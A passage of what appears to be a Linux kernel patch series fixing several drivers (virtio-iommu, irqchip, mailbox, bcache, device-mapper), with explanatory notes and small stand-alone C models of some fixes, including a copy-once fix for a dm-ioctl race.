+-		.head.type	= VIRTIO_IOMMU_T_MAP,
+-		.domain		= cpu_to_le32(vdomain->id),
+-		.virt_start	= cpu_to_le64(iova),
+-		.phys_start	= cpu_to_le64(paddr),
+-		.virt_end	= cpu_to_le64(end),
+-		.flags		= cpu_to_le32(flags),
+-	};
+-
+-	if (!vdomain->nr_endpoints)
+-		return 0;
++	if (vdomain->nr_endpoints) {
++		map = (struct virtio_iommu_req_map) {
++			.head.type	= VIRTIO_IOMMU_T_MAP,
++			.domain		= cpu_to_le32(vdomain->id),
++			.virt_start	= cpu_to_le64(iova),
++			.phys_start	= cpu_to_le64(paddr),
++			.virt_end	= cpu_to_le64(end),
++			.flags		= cpu_to_le32(flags),
++		};
+ 
+-	ret = viommu_send_req_sync(vdomain->viommu, &map, sizeof(map));
+-	if (ret)
+-		viommu_del_mappings(vdomain, iova, end);
+-	else if (mapped)
++		ret = viommu_send_req_sync(vdomain->viommu, &map, sizeof(map));
++		if (ret) {
++			viommu_del_mappings(vdomain, iova, end);
++			return ret;
++		}
++	}
++	if (mapped)
+ 		*mapped = size;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static size_t viommu_unmap_pages(struct iommu_domain *domain, unsigned long iova,
+@@ -991,6 +1015,7 @@ static void viommu_release_device(struct device *dev)
+ {
+ 	struct viommu_endpoint *vdev = dev_iommu_priv_get(dev);
+ 
++	viommu_detach_dev(vdev);
+ 	iommu_put_resv_regions(dev, &vdev->resv_regions);
+ 	kfree(vdev);
+ }
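
The viommu_detach_dev() helper added above builds one detach request for the
domain and re-sends it once per endpoint ID owned by the device. A trimmed
stand-alone model of that loop, with a printf() standing in for the virtio
request transport and reduced structures in place of the driver's:

#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

struct detach_req { uint32_t domain; uint32_t endpoint; };

struct endpoint_dev {
	uint32_t ids[4];	/* fwspec->ids */
	size_t num_ids;		/* fwspec->num_ids */
	int domain_id;		/* negative once detached */
};

static void send_req_sync(const struct detach_req *req)
{
	printf("DETACH domain=%u endpoint=%u\n", req->domain, req->endpoint);
}

static void detach_dev(struct endpoint_dev *ep)
{
	struct detach_req req;
	size_t i;

	if (ep->domain_id < 0)	/* not attached: nothing to do */
		return;

	req.domain = (uint32_t)ep->domain_id;
	for (i = 0; i < ep->num_ids; i++) {
		req.endpoint = ep->ids[i];
		send_req_sync(&req);
	}
	ep->domain_id = -1;	/* vdev->vdomain = NULL */
}

int main(void)
{
	struct endpoint_dev ep = { .ids = { 7, 8 }, .num_ids = 2, .domain_id = 3 };

	detach_dev(&ep);
	detach_dev(&ep);	/* second call is a no-op */
	return 0;
}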
+diff --git a/drivers/irqchip/irq-jcore-aic.c b/drivers/irqchip/irq-jcore-aic.c
+index 5f47d8ee4ae39..b9dcc8e78c750 100644
+--- a/drivers/irqchip/irq-jcore-aic.c
++++ b/drivers/irqchip/irq-jcore-aic.c
+@@ -68,6 +68,7 @@ static int __init aic_irq_of_init(struct device_node *node,
+ 	unsigned min_irq = JCORE_AIC2_MIN_HWIRQ;
+ 	unsigned dom_sz = JCORE_AIC_MAX_HWIRQ+1;
+ 	struct irq_domain *domain;
++	int ret;
+ 
+ 	pr_info("Initializing J-Core AIC\n");
+ 
+@@ -100,6 +101,12 @@ static int __init aic_irq_of_init(struct device_node *node,
+ 	jcore_aic.irq_unmask = noop;
+ 	jcore_aic.name = "AIC";
+ 
++	ret = irq_alloc_descs(-1, min_irq, dom_sz - min_irq,
++			      of_node_to_nid(node));
++
++	if (ret < 0)
++		return ret;
++
+ 	domain = irq_domain_add_legacy(node, dom_sz - min_irq, min_irq, min_irq,
+ 				       &jcore_aic_irqdomain_ops,
+ 				       &jcore_aic);
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 679e2b68e6e9d..5839395099d66 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -162,7 +162,7 @@ static int pch_pic_domain_translate(struct irq_domain *d,
+ 		if (fwspec->param_count < 2)
+ 			return -EINVAL;
+ 
+-		*hwirq = fwspec->param[0] + priv->ht_vec_base;
++		*hwirq = fwspec->param[0];
+ 		*type = fwspec->param[1] & IRQ_TYPE_SENSE_MASK;
+ 	} else {
+ 		*hwirq = fwspec->param[0] - priv->gsi_base;
+@@ -188,7 +188,7 @@ static int pch_pic_alloc(struct irq_domain *domain, unsigned int virq,
+ 
+ 	parent_fwspec.fwnode = domain->parent->fwnode;
+ 	parent_fwspec.param_count = 1;
+-	parent_fwspec.param[0] = hwirq;
++	parent_fwspec.param[0] = hwirq + priv->ht_vec_base;
+ 
+ 	err = irq_domain_alloc_irqs_parent(domain, virq, 1, &parent_fwspec);
+ 	if (err)
+@@ -350,14 +350,12 @@ static int __init acpi_cascade_irqdomain_init(void)
+ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 					struct acpi_madt_bio_pic *acpi_pchpic)
+ {
+-	int ret, vec_base;
++	int ret;
+ 	struct fwnode_handle *domain_handle;
+ 
+ 	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
+ 		return 0;
+ 
+-	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+-
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+ 	if (!domain_handle) {
+ 		pr_err("Unable to allocate domain handle\n");
+@@ -365,7 +363,7 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	}
+ 
+ 	ret = pch_pic_init(acpi_pchpic->address, acpi_pchpic->size,
+-				vec_base, parent, domain_handle, acpi_pchpic->gsi_base);
++				0, parent, domain_handle, acpi_pchpic->gsi_base);
+ 
+ 	if (ret < 0) {
+ 		irq_domain_free_fwnode(domain_handle);
+diff --git a/drivers/irqchip/irq-stm32-exti.c b/drivers/irqchip/irq-stm32-exti.c
+index 6a3f7498ea8ea..8bbb2b114636c 100644
+--- a/drivers/irqchip/irq-stm32-exti.c
++++ b/drivers/irqchip/irq-stm32-exti.c
+@@ -173,6 +173,16 @@ static struct irq_chip stm32_exti_h_chip_direct;
+ #define EXTI_INVALID_IRQ       U8_MAX
+ #define STM32MP1_DESC_IRQ_SIZE (ARRAY_SIZE(stm32mp1_exti_banks) * IRQS_PER_BANK)
+ 
++/*
++ * Use some intentionally tricky logic here to initialize the whole array to
++ * EXTI_INVALID_IRQ, but then override certain fields, requiring us to indicate
++ * that we "know" that there are overrides in this structure, and we'll need to
++ * disable that warning from W=1 builds.
++ */
++__diag_push();
++__diag_ignore_all("-Woverride-init",
++		  "logic to initialize all and then override some is OK");
++
+ static const u8 stm32mp1_desc_irq[] = {
+ 	/* default value */
+ 	[0 ... (STM32MP1_DESC_IRQ_SIZE - 1)] = EXTI_INVALID_IRQ,
+@@ -266,6 +276,8 @@ static const u8 stm32mp13_desc_irq[] = {
+ 	[70] = 98,
+ };
+ 
++__diag_pop();
++
+ static const struct stm32_exti_drv_data stm32mp1_drv_data = {
+ 	.exti_banks = stm32mp1_exti_banks,
+ 	.bank_nr = ARRAY_SIZE(stm32mp1_exti_banks),
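
The table the __diag_push()/__diag_pop() pair wraps relies on GCC's
range-designator extension: every slot is filled with a default, then a few
designators override individual entries, which is precisely what
-Woverride-init complains about under W=1. A small stand-alone illustration
(sizes and values made up), which builds with GCC or Clang:

#include <stdio.h>

#define INVALID 0xff
#define TABLE_SIZE 8

static const unsigned char desc_irq[TABLE_SIZE] = {
	[0 ... TABLE_SIZE - 1] = INVALID,	/* default value */
	[1] = 10,				/* overrides slot 1 */
	[4] = 23,				/* overrides slot 4 */
};

int main(void)
{
	int i;

	for (i = 0; i < TABLE_SIZE; i++)
		printf("desc_irq[%d] = %u\n", i, desc_irq[i]);
	return 0;
}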
+diff --git a/drivers/leds/trigger/ledtrig-netdev.c b/drivers/leds/trigger/ledtrig-netdev.c
+index d5e774d830215..f4d670ec30bcb 100644
+--- a/drivers/leds/trigger/ledtrig-netdev.c
++++ b/drivers/leds/trigger/ledtrig-netdev.c
+@@ -318,6 +318,9 @@ static int netdev_trig_notify(struct notifier_block *nb,
+ 	clear_bit(NETDEV_LED_MODE_LINKUP, &trigger_data->mode);
+ 	switch (evt) {
+ 	case NETDEV_CHANGENAME:
++		if (netif_carrier_ok(dev))
++			set_bit(NETDEV_LED_MODE_LINKUP, &trigger_data->mode);
++		fallthrough;
+ 	case NETDEV_REGISTER:
+ 		if (trigger_data->net_dev)
+ 			dev_put(trigger_data->net_dev);
+diff --git a/drivers/mailbox/ti-msgmgr.c b/drivers/mailbox/ti-msgmgr.c
+index ddac423ac1a91..03048cbda525e 100644
+--- a/drivers/mailbox/ti-msgmgr.c
++++ b/drivers/mailbox/ti-msgmgr.c
+@@ -430,14 +430,20 @@ static int ti_msgmgr_send_data(struct mbox_chan *chan, void *data)
+ 		/* Ensure all unused data is 0 */
+ 		data_trail &= 0xFFFFFFFF >> (8 * (sizeof(u32) - trail_bytes));
+ 		writel(data_trail, data_reg);
+-		data_reg++;
++		data_reg += sizeof(u32);
+ 	}
++
+ 	/*
+ 	 * 'data_reg' indicates next register to write. If we did not already
+ 	 * write on tx complete reg(last reg), we must do so for transmit
++	 * In addition, we also need to make sure all intermediate data
++	 * registers (if any are required) are reset to 0 to maintain
++	 * TISCI backward compatibility.
+ 	 */
+-	if (data_reg <= qinst->queue_buff_end)
+-		writel(0, qinst->queue_buff_end);
++	while (data_reg <= qinst->queue_buff_end) {
++		writel(0, data_reg);
++		data_reg += sizeof(u32);
++	}
+ 
+ 	/* If we are in polled mode, wait for a response before proceeding */
+ 	if (ti_msgmgr_chan_has_polled_queue_rx(message->chan_rx))
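
The corrected send path advances the register pointer in 32-bit steps and then
zeroes every remaining register up to and including the transmit-trigger
register at queue_buff_end. A stand-alone model of that fill logic, with a
plain array standing in for the MMIO queue (sizes and names are illustrative):

#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NUM_DATA_REGS 16

static uint32_t queue_regs[NUM_DATA_REGS];	/* queue_buff_start..end */

static void msgmgr_send(const void *msg, size_t len)
{
	uint32_t *data_reg = queue_regs;
	uint32_t *queue_buff_end = &queue_regs[NUM_DATA_REGS - 1];
	size_t full = len / sizeof(uint32_t);
	size_t trail = len % sizeof(uint32_t);
	size_t i;

	for (i = 0; i < full; i++, data_reg++)
		memcpy(data_reg, (const uint8_t *)msg + i * 4, 4);

	if (trail) {
		uint32_t data_trail = 0;	/* unused bytes stay 0 */

		memcpy(&data_trail, (const uint8_t *)msg + full * 4, trail);
		*data_reg++ = data_trail;
	}

	/* Zero all remaining registers; writing the last one triggers TX. */
	while (data_reg <= queue_buff_end)
		*data_reg++ = 0;
}

int main(void)
{
	int i;

	msgmgr_send("hello, tisci", 12);
	for (i = 0; i < NUM_DATA_REGS; i++)
		printf("reg[%2d] = 0x%08x\n", i, queue_regs[i]);
	return 0;
}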
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 147c493a989a5..68b9d7ca864e2 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -885,7 +885,7 @@ static struct btree *mca_cannibalize(struct cache_set *c, struct btree_op *op,
+  * cannibalize_bucket() will take. This means every time we unlock the root of
+  * the btree, we need to release this lock if we have it held.
+  */
+-static void bch_cannibalize_unlock(struct cache_set *c)
++void bch_cannibalize_unlock(struct cache_set *c)
+ {
+ 	spin_lock(&c->btree_cannibalize_lock);
+ 	if (c->btree_cache_alloc_lock == current) {
+@@ -1090,10 +1090,12 @@ struct btree *__bch_btree_node_alloc(struct cache_set *c, struct btree_op *op,
+ 				     struct btree *parent)
+ {
+ 	BKEY_PADDED(key) k;
+-	struct btree *b = ERR_PTR(-EAGAIN);
++	struct btree *b;
+ 
+ 	mutex_lock(&c->bucket_lock);
+ retry:
++	/* return ERR_PTR(-EAGAIN) when it fails */
++	b = ERR_PTR(-EAGAIN);
+ 	if (__bch_bucket_alloc_set(c, RESERVE_BTREE, &k.key, wait))
+ 		goto err;
+ 
+@@ -1138,7 +1140,7 @@ static struct btree *btree_node_alloc_replacement(struct btree *b,
+ {
+ 	struct btree *n = bch_btree_node_alloc(b->c, op, b->level, b->parent);
+ 
+-	if (!IS_ERR_OR_NULL(n)) {
++	if (!IS_ERR(n)) {
+ 		mutex_lock(&n->write_lock);
+ 		bch_btree_sort_into(&b->keys, &n->keys, &b->c->sort);
+ 		bkey_copy_key(&n->key, &b->key);
+@@ -1340,7 +1342,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 	memset(new_nodes, 0, sizeof(new_nodes));
+ 	closure_init_stack(&cl);
+ 
+-	while (nodes < GC_MERGE_NODES && !IS_ERR_OR_NULL(r[nodes].b))
++	while (nodes < GC_MERGE_NODES && !IS_ERR(r[nodes].b))
+ 		keys += r[nodes++].keys;
+ 
+ 	blocks = btree_default_blocks(b->c) * 2 / 3;
+@@ -1352,7 +1354,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 
+ 	for (i = 0; i < nodes; i++) {
+ 		new_nodes[i] = btree_node_alloc_replacement(r[i].b, NULL);
+-		if (IS_ERR_OR_NULL(new_nodes[i]))
++		if (IS_ERR(new_nodes[i]))
+ 			goto out_nocoalesce;
+ 	}
+ 
+@@ -1487,7 +1489,7 @@ out_nocoalesce:
+ 	bch_keylist_free(&keylist);
+ 
+ 	for (i = 0; i < nodes; i++)
+-		if (!IS_ERR_OR_NULL(new_nodes[i])) {
++		if (!IS_ERR(new_nodes[i])) {
+ 			btree_node_free(new_nodes[i]);
+ 			rw_unlock(true, new_nodes[i]);
+ 		}
+@@ -1669,7 +1671,7 @@ static int bch_btree_gc_root(struct btree *b, struct btree_op *op,
+ 	if (should_rewrite) {
+ 		n = btree_node_alloc_replacement(b, NULL);
+ 
+-		if (!IS_ERR_OR_NULL(n)) {
++		if (!IS_ERR(n)) {
+ 			bch_btree_node_write_sync(n);
+ 
+ 			bch_btree_set_root(n);
+@@ -1968,6 +1970,15 @@ static int bch_btree_check_thread(void *arg)
+ 			c->gc_stats.nodes++;
+ 			bch_btree_op_init(&op, 0);
+ 			ret = bcache_btree(check_recurse, p, c->root, &op);
++			/*
++			 * The op may be added to cache_set's btree_cache_wait
++			 * in mca_cannibalize(); we must ensure it is removed
++			 * from the list and that btree_cache_alloc_lock is
++			 * released before the op memory is freed. Otherwise,
++			 * the btree_cache_wait list will be corrupted.
++			 */
++			bch_cannibalize_unlock(c);
++			finish_wait(&c->btree_cache_wait, &(&op)->wait);
+ 			if (ret)
+ 				goto out;
+ 		}
+diff --git a/drivers/md/bcache/btree.h b/drivers/md/bcache/btree.h
+index 1b5fdbc0d83eb..a2920bbfcad56 100644
+--- a/drivers/md/bcache/btree.h
++++ b/drivers/md/bcache/btree.h
+@@ -282,6 +282,7 @@ void bch_initial_gc_finish(struct cache_set *c);
+ void bch_moving_gc(struct cache_set *c);
+ int bch_btree_check(struct cache_set *c);
+ void bch_initial_mark_key(struct cache_set *c, int level, struct bkey *k);
++void bch_cannibalize_unlock(struct cache_set *c);
+ 
+ static inline void wake_up_gc(struct cache_set *c)
+ {
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index ba3909bb6beab..7660962e7b8b4 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -1724,7 +1724,7 @@ static void cache_set_flush(struct closure *cl)
+ 	if (!IS_ERR_OR_NULL(c->gc_thread))
+ 		kthread_stop(c->gc_thread);
+ 
+-	if (!IS_ERR_OR_NULL(c->root))
++	if (!IS_ERR(c->root))
+ 		list_add(&c->root->list, &c->btree_cache);
+ 
+ 	/*
+@@ -2088,7 +2088,7 @@ static int run_cache_set(struct cache_set *c)
+ 
+ 		err = "cannot allocate new btree root";
+ 		c->root = __bch_btree_node_alloc(c, NULL, 0, true, NULL);
+-		if (IS_ERR_OR_NULL(c->root))
++		if (IS_ERR(c->root))
+ 			goto err;
+ 
+ 		mutex_lock(&c->root->write_lock);
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 0285b676e9834..7bac2a88b794a 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -890,6 +890,16 @@ static int bch_root_node_dirty_init(struct cache_set *c,
+ 	if (ret < 0)
+ 		pr_warn("sectors dirty init failed, ret=%d!\n", ret);
+ 
++	/*
++	 * The op may be added to cache_set's btree_cache_wait
++	 * in mca_cannibalize(); we must ensure it is removed
++	 * from the list and that btree_cache_alloc_lock is
++	 * released before the op memory is freed. Otherwise,
++	 * the btree_cache_wait list will be corrupted.
++	 */
++	bch_cannibalize_unlock(c);
++	finish_wait(&c->btree_cache_wait, &(&op.op)->wait);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index ee269b1d09fac..ff515437d81e7 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -733,8 +733,7 @@ static int crypt_iv_eboiv_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 	}
+ 
+ 	if (crypto_skcipher_blocksize(any_tfm(cc)) != cc->iv_size) {
+-		ti->error = "Block size of EBOIV cipher does "
+-			    "not match IV size of block cipher";
++		ti->error = "Block size of EBOIV cipher does not match IV size of block cipher";
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 6ae1c19b82433..2afd2d2a0f407 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -434,8 +434,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		hc = __get_name_cell(new);
+ 
+ 	if (hc) {
+-		DMERR("Unable to change %s on mapped device %s to one that "
+-		      "already exists: %s",
++		DMERR("Unable to change %s on mapped device %s to one that already exists: %s",
+ 		      change_uuid ? "uuid" : "name",
+ 		      param->name, new);
+ 		dm_put(hc->md);
+@@ -1572,7 +1571,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	/*
+ 	 * Count the devices.
+ 	 */
+-	list_for_each (tmp, dm_table_get_devices(table))
++	list_for_each(tmp, dm_table_get_devices(table))
+ 		count++;
+ 
+ 	/*
+@@ -1589,7 +1588,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	 */
+ 	deps->count = count;
+ 	count = 0;
+-	list_for_each_entry (dd, dm_table_get_devices(table), list)
++	list_for_each_entry(dd, dm_table_get_devices(table), list)
+ 		deps->dev[count++] = huge_encode_dev(dd->dm_dev->bdev->bd_dev);
+ 
+ 	param->data_size = param->data_start + needed;
+@@ -1812,31 +1811,36 @@ static ioctl_fn lookup_ioctl(unsigned int cmd, int *ioctl_flags)
+  * As well as checking the version compatibility this always
+  * copies the kernel interface version out.
+  */
+-static int check_version(unsigned int cmd, struct dm_ioctl __user *user)
++static int check_version(unsigned int cmd, struct dm_ioctl __user *user,
++			 struct dm_ioctl *kernel_params)
+ {
+-	uint32_t version[3];
+ 	int r = 0;
+ 
+-	if (copy_from_user(version, user->version, sizeof(version)))
++	/* Make certain version is first member of dm_ioctl struct */
++	BUILD_BUG_ON(offsetof(struct dm_ioctl, version) != 0);
++
++	if (copy_from_user(kernel_params->version, user->version, sizeof(kernel_params->version)))
+ 		return -EFAULT;
+ 
+-	if ((DM_VERSION_MAJOR != version[0]) ||
+-	    (DM_VERSION_MINOR < version[1])) {
+-		DMERR("ioctl interface mismatch: "
+-		      "kernel(%u.%u.%u), user(%u.%u.%u), cmd(%d)",
++	if ((kernel_params->version[0] != DM_VERSION_MAJOR) ||
++	    (kernel_params->version[1] > DM_VERSION_MINOR)) {
++		DMERR("ioctl interface mismatch: kernel(%u.%u.%u), user(%u.%u.%u), cmd(%d)",
+ 		      DM_VERSION_MAJOR, DM_VERSION_MINOR,
+ 		      DM_VERSION_PATCHLEVEL,
+-		      version[0], version[1], version[2], cmd);
++		      kernel_params->version[0],
++		      kernel_params->version[1],
++		      kernel_params->version[2],
++		      cmd);
+ 		r = -EINVAL;
+ 	}
+ 
+ 	/*
+ 	 * Fill in the kernel version.
+ 	 */
+-	version[0] = DM_VERSION_MAJOR;
+-	version[1] = DM_VERSION_MINOR;
+-	version[2] = DM_VERSION_PATCHLEVEL;
+-	if (copy_to_user(user->version, version, sizeof(version)))
++	kernel_params->version[0] = DM_VERSION_MAJOR;
++	kernel_params->version[1] = DM_VERSION_MINOR;
++	kernel_params->version[2] = DM_VERSION_PATCHLEVEL;
++	if (copy_to_user(user->version, kernel_params->version, sizeof(kernel_params->version)))
+ 		return -EFAULT;
+ 
+ 	return r;
+@@ -1862,7 +1866,10 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+ 	unsigned int noio_flag;
+ 
+-	if (copy_from_user(param_kernel, user, minimum_data_size))
++	/* check_version() already copied version from userspace, avoid TOCTOU */
++	if (copy_from_user((char *)param_kernel + sizeof(param_kernel->version),
++			   (char __user *)user + sizeof(param_kernel->version),
++			   minimum_data_size - sizeof(param_kernel->version)))
+ 		return -EFAULT;
+ 
+ 	if (param_kernel->data_size < minimum_data_size) {
+@@ -1974,7 +1981,7 @@ static int ctl_ioctl(struct file *file, uint command, struct dm_ioctl __user *us
+ 	 * Check the interface version passed in.  This also
+ 	 * writes out the kernel's interface version.
+ 	 */
+-	r = check_version(cmd, user);
++	r = check_version(cmd, user, &param_kernel);
+ 	if (r)
+ 		return r;
+ 
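
Together, the check_version() and copy_params() changes implement a copy-once
pattern: the version words are fetched from userspace exactly once, and the
remainder of the header is copied starting just past them, so a concurrent
writer can no longer swap the version between validation and use. A user-space
sketch of the same pattern, with memcpy() standing in for copy_from_user()
(the struct layout and the checked major value are illustrative):

#include <stdio.h>
#include <string.h>
#include <stdint.h>

struct dm_hdr {
	uint32_t version[3];	/* must stay the first member */
	uint32_t data_size;
};

static int copy_header_once(struct dm_hdr *kernel, const struct dm_hdr *user)
{
	/* step 1: fetch and validate the version, once */
	memcpy(kernel->version, user->version, sizeof(kernel->version));
	if (kernel->version[0] != 4)	/* DM_VERSION_MAJOR, say */
		return -1;

	/* step 2: fetch the remainder, skipping the already-copied version */
	memcpy((char *)kernel + sizeof(kernel->version),
	       (const char *)user + sizeof(kernel->version),
	       sizeof(*kernel) - sizeof(kernel->version));
	return 0;
}

int main(void)
{
	struct dm_hdr user = { .version = { 4, 47, 0 }, .data_size = 512 };
	struct dm_hdr kernel = { { 0 }, 0 };

	printf("rc=%d data_size=%u\n",
	       copy_header_once(&kernel, &user), kernel.data_size);
	return 0;
}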
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index 072559b709edd..ee5586e8e1c1e 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -108,9 +108,8 @@ static int fill_pkg(struct cn_msg *msg, struct dm_ulog_request *tfr)
+ 			if (pkg->error != -EAGAIN)
+ 				*(pkg->data_size) = 0;
+ 		} else if (tfr->data_size > *(pkg->data_size)) {
+-			DMERR("Insufficient space to receive package [%u] "
+-			      "(%u vs %zu)", tfr->request_type,
+-			      tfr->data_size, *(pkg->data_size));
++			DMERR("Insufficient space to receive package [%u] (%u vs %zu)",
++			      tfr->request_type, tfr->data_size, *(pkg->data_size));
+ 
+ 			*(pkg->data_size) = 0;
+ 			pkg->error = -ENOSPC;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index 159f2c05dfd3c..05141eea18d3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -382,8 +382,7 @@ static int create_log_context(struct dm_dirty_log *log, struct dm_target *ti,
+ 		else if (!strcmp(argv[1], "nosync"))
+ 			sync = NOSYNC;
+ 		else {
+-			DMWARN("unrecognised sync argument to "
+-			       "dirty region log: %s", argv[1]);
++			DMWARN("unrecognised sync argument to dirty region log: %s", argv[1]);
+ 			return -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 91c25ad8eed84..66032ab3c4e92 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -1086,7 +1086,7 @@ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ 			goto fail;
+ 		}
+ 		j = sprintf(p, "%d", hw_argc - 1);
+-		for (i = 0, p+=j+1; i <= hw_argc - 2; i++, p+=j+1)
++		for (i = 0, p += j + 1; i <= hw_argc - 2; i++, p += j + 1)
+ 			j = sprintf(p, "%s", as->argv[i]);
+ 	}
+ 	dm_consume_args(as, hw_argc - 1);
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 84d26234dc053..eba2293be6864 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -127,8 +127,7 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ 	 * 			The valid range: 0-<ST_MAX_RELATIVE_THROUGHPUT>
+ 	 *			If not given, minimum value '1' is used.
+ 	 *			If '0' is given, the path isn't selected while
+-	 * 			other paths having a positive value are
+-	 * 			available.
++	 *			other paths having a positive value are	available.
+ 	 */
+ 	if (argc > 2) {
+ 		*error = "service-time ps: incorrect number of arguments";
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 8bd7e87d3538e..c38e63706d911 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -236,8 +236,8 @@ static void fail_mirror(struct mirror *m, enum dm_raid1_error error_type)
+ 		 * Better to issue requests to same failing device
+ 		 * than to risk returning corrupt data.
+ 		 */
+-		DMERR("Primary mirror (%s) failed while out-of-sync: "
+-		      "Reads may fail.", m->dev->name);
++		DMERR("Primary mirror (%s) failed while out-of-sync: Reads may fail.",
++		      m->dev->name);
+ 		goto out;
+ 	}
+ 
+@@ -517,8 +517,7 @@ static void read_callback(unsigned long error, void *context)
+ 	fail_mirror(m, DM_RAID1_READ_ERROR);
+ 
+ 	if (likely(default_ok(m)) || mirror_available(m->ms, bio)) {
+-		DMWARN_LIMIT("Read failure on mirror device %s.  "
+-			     "Trying alternative device.",
++		DMWARN_LIMIT("Read failure on mirror device %s. Trying alternative device.",
+ 			     m->dev->name);
+ 		queue_bio(m->ms, bio, bio_data_dir(bio));
+ 		return;
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 5176810f5d243..80b95746a43e0 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -354,8 +354,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ 		return 0;
+ 
+ 	if (chunk_size_supplied)
+-		DMWARN("chunk size %u in device metadata overrides "
+-		       "table chunk size of %u.",
++		DMWARN("chunk size %u in device metadata overrides table chunk size of %u.",
+ 		       chunk_size, ps->store->chunk_size);
+ 
+ 	/* We had a bogus chunk_size. Fix stuff up. */
+@@ -958,8 +957,7 @@ int dm_persistent_snapshot_init(void)
+ 
+ 	r = dm_exception_store_type_register(&_persistent_compat_type);
+ 	if (r) {
+-		DMERR("Unable to register old-style persistent exception "
+-		      "store type");
++		DMERR("Unable to register old-style persistent exception store type");
+ 		dm_exception_store_type_unregister(&_persistent_type);
+ 		return r;
+ 	}
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index d83a0565bd101..11de107f5f462 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -140,8 +140,7 @@ int dm_transient_snapshot_init(void)
+ 
+ 	r = dm_exception_store_type_register(&_transient_compat_type);
+ 	if (r) {
+-		DMWARN("Unable to register old-style transient "
+-		       "exception store type");
++		DMWARN("Unable to register old-style transient exception store type");
+ 		dm_exception_store_type_unregister(&_transient_type);
+ 		return r;
+ 	}
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index c64d987c544d7..b748901a4fb55 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -388,7 +388,7 @@ static struct origin *__lookup_origin(struct block_device *origin)
+ 	struct origin *o;
+ 
+ 	ol = &_origins[origin_hash(origin)];
+-	list_for_each_entry (o, ol, hash_list)
++	list_for_each_entry(o, ol, hash_list)
+ 		if (bdev_equal(o->bdev, origin))
+ 			return o;
+ 
+@@ -407,7 +407,7 @@ static struct dm_origin *__lookup_dm_origin(struct block_device *origin)
+ 	struct dm_origin *o;
+ 
+ 	ol = &_dm_origins[origin_hash(origin)];
+-	list_for_each_entry (o, ol, hash_list)
++	list_for_each_entry(o, ol, hash_list)
+ 		if (bdev_equal(o->dev->bdev, origin))
+ 			return o;
+ 
+@@ -490,8 +490,7 @@ static int __validate_exception_handover(struct dm_snapshot *snap)
+ 	if ((__find_snapshots_sharing_cow(snap, &snap_src, &snap_dest,
+ 					  &snap_merge) == 2) ||
+ 	    snap_dest) {
+-		snap->ti->error = "Snapshot cow pairing for exception "
+-				  "table handover failed";
++		snap->ti->error = "Snapshot cow pairing for exception table handover failed";
+ 		return -EINVAL;
+ 	}
+ 
+@@ -518,8 +517,7 @@ static int __validate_exception_handover(struct dm_snapshot *snap)
+ 
+ 	if (!snap_src->store->type->prepare_merge ||
+ 	    !snap_src->store->type->commit_merge) {
+-		snap->ti->error = "Snapshot exception store does not "
+-				  "support snapshot-merge.";
++		snap->ti->error = "Snapshot exception store does not support snapshot-merge.";
+ 		return -EINVAL;
+ 	}
+ 
